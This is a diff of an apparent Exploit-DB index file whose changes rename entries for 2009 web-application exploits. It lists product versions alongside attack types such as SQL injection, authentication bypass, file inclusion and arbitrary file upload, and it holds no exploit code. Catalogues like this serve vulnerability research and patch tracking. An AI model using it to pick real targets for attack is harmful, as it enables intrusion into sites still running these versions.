 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0
 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0
@@ -20883,21 +20886,21 @@ id,file,description,date,author,platform,type,port 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 -8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0 +8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 -8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 +8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,php,webapps,0 8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 8475,platforms/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 -8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Authentication Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0 +8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - Authentication Bypass",2009-04-17,HCOCA_MAN,php,webapps,0 
8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 -8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 +8487,platforms/php/webapps/8487.txt,"EZ Webitor - Authentication Bypass",2009-04-20,snakespc,php,webapps,0 8488,platforms/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 
@@ -20905,7 +20908,7 @@ id,file,description,date,author,platform,type,port
 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0
 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0
 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
-8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0
+8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",php,webapps,0
 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0
 8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0
 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0
@@ -20914,12 +20917,12 @@ id,file,description,date,author,platform,type,port
 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0
 8505,platforms/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0
 8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0
-8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection",2009-04-21,Hakxer,php,webapps,0
+8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - Authentication Bypass",2009-04-21,Hakxer,php,webapps,0
 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0
 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps,0
 8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps,0
 8514,platforms/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0
-8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Authentication Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0
+8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - Authentication Bypass",2009-04-22,zer0day,php,webapps,0
 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion",2009-04-22,ahmadbady,php,webapps,0
 8517,platforms/php/webapps/8517.txt,"Joomla! Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,php,webapps,0
 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload",2009-04-23,YEnH4ckEr,php,webapps,0
@@ -20947,7 +20950,7 @@ id,file,description,date,author,platform,type,port
 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0
 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0
 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0
-8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Authentication Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0
+8571,platforms/php/webapps/8571.txt,"Tiger Dms - Authentication Bypass",2009-04-29,"ThE g0bL!N",php,webapps,0
 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0
 8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,php,webapps,0
 8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0
@@ -20975,9 +20978,9 @@ id,file,description,date,author,platform,type,port
 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0
 8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0
 8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0
-8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0
-8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0
-8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0
+8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup",2009-05-08,TiGeR-Dz,php,webapps,0
+8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - Authentication Bypass",2009-05-08,"ThE g0bL!N",php,webapps,0
+8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - Authentication Bypass",2009-05-08,knxone,php,webapps,0
 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
 8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
@@ -20994,12 +20997,12 @@ id,file,description,date,author,platform,type,port
 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
 8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0
 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0
-8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0
+8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0
 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps,0
 8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - (arch.php arch) Local File Inclusion",2009-05-14,Kacper,php,webapps,0
 8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],php,webapps,0
 8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
-8683,platforms/php/webapps/8683.txt,"Submitter Script - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0
+8683,platforms/php/webapps/8683.txt,"Submitter Script - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0
 8684,platforms/php/webapps/8684.txt,"MRCGIGUY Hot Links SQL 3.2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
 8685,platforms/php/webapps/8685.txt,"MRCGIGUY Amazon Directory 1.0/2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
 8686,platforms/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
@@ -21019,7 +21022,7 @@ id,file,description,date,author,platform,type,port
 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0
 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0
 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0
-8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Authentication Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0
+8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - Authentication Bypass",2009-05-18,snakespc,php,webapps,0
 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0
 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0
 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0
@@ -21041,7 +21044,7 @@ id,file,description,date,author,platform,type,port
 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps,0
 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0
 8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,php,webapps,0
-8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0
+8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - Authentication Bypass",2009-05-19,snakespc,php,webapps,0
 8743,platforms/php/webapps/8743.txt,"Joomla! Component Casino 0.3.1 - Multiple SQL Injections Exploits",2009-05-20,ByALBAYX,php,webapps,0
 8744,platforms/php/webapps/8744.txt,"Exjune Officer Message System 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
 8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,php,webapps,0
@@ -21052,10 +21055,10 @@ id,file,description,date,author,platform,type,port
 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0
 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0
 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0
-8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0
+8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - Authentication Bypass",2009-05-21,Striker7,php,webapps,0
 8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,asp,webapps,0
 8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps,0
-8761,platforms/php/webapps/8761.txt,"Article Directory - (Authentication Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0
+8761,platforms/php/webapps/8761.txt,"Article Directory - Authentication Bypass",2009-05-21,Hakxer,php,webapps,0
 8762,platforms/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0
 8763,platforms/php/webapps/8763.txt,"ZaoCMS - Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0
 8764,platforms/php/webapps/8764.txt,"ZaoCMS - 'download.php' Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0
@@ -21085,7 +21088,7 @@ id,file,description,date,author,platform,type,port
 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",php,webapps,0
 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0
 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0
-8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0
+8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps,0
 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0
 8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0
 8811,platforms/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps,0
@@ -21100,7 +21103,7 @@ id,file,description,date,author,platform,type,port
 8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection",2009-05-29,intern0t,php,webapps,0
 8821,platforms/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0
 8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0
-8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
+8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - Authentication Bypass",2009-05-29,TiGeR-Dz,php,webapps,0
 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps,0
 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
@@ -21129,7 +21132,7 @@ id,file,description,date,author,platform,type,port
 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0
 8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0
 8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
-8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0
+8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - Authentication Bypass",2009-06-03,Qabandi,php,webapps,0
 8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0
 8867,platforms/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0
@@ -21143,10 +21146,10 @@ id,file,description,date,author,platform,type,port
 8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0
 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0
 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0
-8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Authentication Bypass) SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0
+8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",php,webapps,0
 8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0
 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0
-8886,platforms/php/webapps/8886.txt,"MyCars Automotive - (Authentication Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0
+8886,platforms/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps,0
 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
 8890,platforms/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
 8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0
@@ -21183,7 +21186,7 @@ id,file,description,date,author,platform,type,port
 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0
 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps,0
 8933,platforms/php/webapps/8933.php,"Sniggabo CMS - 'article.php id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0
-8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0
+8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - Authentication Bypass",2009-06-12,ByALBAYX,php,webapps,0
 8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0
 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,php,webapps,0
 8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,php,webapps,0
@@ -21242,12 +21245,12 @@ id,file,description,date,author,platform,type,port
 9016,platforms/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0
 9017,platforms/php/webapps/9017.txt,"Joomla! Component com_pinboard - (task) SQL Injection",2009-06-25,Stack,php,webapps,0
 9018,platforms/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps,0
-9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
+9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - Authentication Bypass",2009-06-25,YEnH4ckEr,php,webapps,0
 9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - (resetpwemail) Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
 9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0
 9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps,0
 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps,0
-9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Authentication Bypass) SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0
+9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",php,webapps,0
 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0
 9026,platforms/php/webapps/9026.txt,"WHOISCART - (Authentication Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0
 9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0
@@ -21283,7 +21286,7 @@ id,file,description,date,author,platform,type,port
 9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0
 9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,php,webapps,0
 9077,platforms/php/webapps/9077.txt,"ConPresso 3.4.8 - 'detail.php' Blind SQL Injection",2009-07-02,tmh,php,webapps,0
-9079,platforms/php/webapps/9079.txt,"Opial 1.0 - (Authentication Bypass) SQL Injection",2009-07-02,Moudi,php,webapps,0
+9079,platforms/php/webapps/9079.txt,"Opial 1.0 - Authentication Bypass",2009-07-02,Moudi,php,webapps,0
 9080,platforms/php/webapps/9080.txt,"Opial 1.0 - 'albumID' SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0
 9081,platforms/php/webapps/9081.txt,"Rentventory - Multiple SQL Injections",2009-07-02,Moudi,php,webapps,0
 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
@@ -21329,7 +21332,7 @@ id,file,description,date,author,platform,type,port
 9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0
 9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,php,webapps,0
 9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0
-9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Authentication Bypass) SQL Injection",2009-07-16,ka0x,php,webapps,0
+9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,php,webapps,0
 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0
 9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0
 9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0
@@ -21352,7 +21355,7 @@ id,file,description,date,author,platform,type,port
 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0
 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0
 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0
-9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection",2009-07-21,n3w7u,php,webapps,0
+9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - Authentication Bypass",2009-07-21,n3w7u,php,webapps,0
 9226,platforms/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection",2009-07-21,Moudi,php,webapps,0
 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0
 9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0
@@ -21364,7 +21367,7 @@ id,file,description,date,author,platform,type,port
 9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0
 9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
-9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
